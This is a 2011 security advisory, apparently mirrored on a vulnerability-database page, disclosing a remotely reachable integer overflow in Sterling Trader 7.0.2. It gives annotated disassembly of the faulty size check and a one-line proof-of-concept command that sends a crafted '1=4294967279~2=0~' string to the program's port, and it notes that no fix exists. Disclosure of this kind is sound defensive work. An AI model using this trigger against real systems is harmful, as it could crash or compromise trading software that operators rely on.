Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27118
HistoryOct 02, 2011 - 12:00 a.m.

Integer overflow in Sterling Trader 7.0.2

2011-10-0200:00:00
vulners.com
13
JSON

#######################################################################

                         Luigi Auriemma

Application: Sterling Trader
http://www.sterlingtrader.com/Trading_Platforms/trading_platforms2.html
Versions: <= 7.0.2
Platforms: Windows
Bug: integer overflow
Exploitation: remote
Date: 25 Sep 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction

From vendor's homepage:
"Sterling Traderยฎ Elite serves institutional firms on the buy side and
sell side. Featuring advanced OMS functionality, global market access,
and multi-broker connectivity solutions, Elite lets firms take control
of their trading."

#######################################################################

======
2) Bug

When this program is running (Base.exe or Elite.exe) it listens on the
first available TCP port which changes each time and it's affected by an
integer overflow vulnerability:

004922E3 > 83BF BC001000 10 CMP DWORD PTR DS:[EDI+1000BC],10
004922EA . 0F8C 66010000 JL Elite.00492456
004922F0 . 8D46 0C LEA EAX,DWORD PTR DS:[ESI+C]
004922F3 . 50 PUSH EAX ; &num2
004922F4 . 8D6E 08 LEA EBP,DWORD PTR DS:[ESI+8]
004922F7 . 55 PUSH EBP ; &num1 (size)
004922F8 . 68 9C23A000 PUSH Elite.00A0239C ; "1=%d~2=%d~"
004922FD . 53 PUSH EBX
004922FE . E8 7CA44600 CALL Elite.008FC77F ; sscanf
00492303 . 83C4 10 ADD ESP,10
00492306 . 83F8 02 CMP EAX,2
00492309 . 0F85 4D010000 JNZ Elite.0049245C
0049230F . 8B55 00 MOV EDX,DWORD PTR SS:[EBP]
00492312 . 83C2 10 ADD EDX,10 ; size + 0x10
00492315 . B9 31000000 MOV ECX,31
0049231A . 66:898E 84000000 MOV WORD PTR DS:[ESI+84],CX
00492321 . 8956 04 MOV DWORD PTR DS:[ESI+4],EDX
00492324 . C746 70 10000000 MOV DWORD PTR DS:[ESI+70],10
0049232B . 33ED XOR EBP,EBP
0049232D > 8B87 BC001000 MOV EAX,DWORD PTR DS:[EDI+1000BC]
00492333 . 3B46 04 CMP EAX,DWORD PTR DS:[ESI+4]
00492336 . 0F8C 3E010000 JL Elite.0049247A
0049233C . 89AF C0001000 MOV DWORD PTR DS:[EDI+1000C0],EBP
00492342 . 8B4E 04 MOV ECX,DWORD PTR DS:[ESI+4]
00492345 . 41 INC ECX ; size + 1
00492346 . 51 PUSH ECX
00492347 . E8 C0673F00 CALL Elite.00888B0C ; malloc()
0049234C . 8B56 04 MOV EDX,DWORD PTR DS:[ESI+4]
0049234F . 52 PUSH EDX
00492350 . 53 PUSH EBX
00492351 . 50 PUSH EAX
00492352 . 8946 6C MOV DWORD PTR DS:[ESI+6C],EAX
00492355 . E8 36774600 CALL Elite.008F9A90 ; memcpy

#######################################################################

===========
3) The Code

http://aluigi.org/testz/udpsz.zip

udpsz -b a -T -c "1=4294967279~2=0~" SERVER PORT 0xffff

#######################################################################

======
4) Fix

No fix.

#######################################################################

Luigi Auriemma
http://aluigi.org

JSON